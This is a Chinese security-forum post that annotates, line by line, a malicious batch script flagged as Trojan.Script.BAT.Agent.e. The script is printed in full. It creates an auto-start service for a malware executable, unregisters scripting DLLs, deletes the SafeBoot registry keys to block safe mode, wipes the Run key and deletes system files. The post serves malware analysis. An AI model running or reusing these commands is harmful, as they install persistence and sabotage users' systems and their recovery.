瑞星卡卡安全论坛技术交流区可疑文件交流 一段bat(RS报Trojan.Script.BAT.Agent.e)

1   1  /  1  页   跳转

一段bat(RS报Trojan.Script.BAT.Agent.e)

一段bat(RS报Trojan.Script.BAT.Agent.e)

yojlqqzjowe
breziwbgn
lppenbcwgly
kwmdluupbt
date 2004-08-17(返回日期)
time 20:00:00(返回时间)
ping 127.0.0.1 -n 5(ping自己,发5个包)
sc.exe create yahbfveaczn BinPath= "C:\WINDOWS\system32\yahbfveaczn.exe -k_ill" type= own type= interact start= auto DisplayName= bwsgzyeqez(sc创建病毒文件,类型是互相启动,显示名字bwsgzyeqez)
sc.exe description yahbfveaczn sszkzcbtasoljspzqkjlskajcreqdyvqosvdqquhvmtypjelg(对文件描述)
regsvr32.exe /u /s scrrun.dll(反注册该文件,scrrun.dll用于阅读和编写脚本和文本文件)
regsvr32.exe /u /s shimgvw.dll(反注册该文件,shimgvw.dll用于图像显示的COM接口程序)
regsvr32.exe /u /s itss.dll(反注册该文件,itss.dll是微软Microsoft储存系统相关文件)
regsvr32.exe /u /s vbscript.dll(反注册该文件,vbscript.dll是VBScript脚本相关支持文件,让大家的QQ空间等不能使用)
regsvr32.exe /s jscript.dll(反注册该文件,jscript.dll是Microsoft JavaScript脚本支持相关文件,让大家的QQ空间等不能使用
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F(让系统蓝屏和无法进入安全模式)
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
sc.exe start yahbfveaczn(启动病毒)
time 11:26:53
date 2008-06-02
del "C:\WINDOWS\system32\JDKFYPU.exe" /F(删除病毒文件,/F是强制删除只读文件)
del %0
del "C:\WINDOWS\Media\Windows XP 开始.wav"(删除系统声音)
del "C:\WINDOWS\Media\Windows XP 信息栏.wav"
del "C:\WINDOWS\Media\Windows XP 弹出窗口已阻止.wav"
ping 127.0.0.1 -n 16(ping自己,发送16个包)
del "C:\WINDOWS\system32\JDKFYPU.exe" /F
del %0
exit(退出)

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; MAXTHON 2.0)
制兹八拍兮拟排忧,何知曲成兮心转愁
分享到:
gototop
 

回复:一段bat(RS报Trojan.Script.BAT.Agent.e)

制兹八拍兮拟排忧,何知曲成兮心转愁
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT